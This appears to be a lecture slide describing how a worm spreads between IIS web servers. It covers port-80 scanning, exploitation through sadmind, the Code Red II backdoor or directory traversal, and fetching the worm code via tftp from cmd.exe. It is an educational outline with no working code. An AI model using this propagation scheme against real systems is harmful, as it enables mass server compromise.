IIS Propagation
Infected system scans TCP port 80 looking for Web servers
- Most address scanning is local; random IP address use ~25%
When a Web server is found, attacker attempts various exploits
- sadmind vulnerability
- Code Red II root.exe or other backdoor
- IIS Directory Traversal vulnerability
Victim server obtains worm code (admin.dll) from attacker using tftp from cmd.exe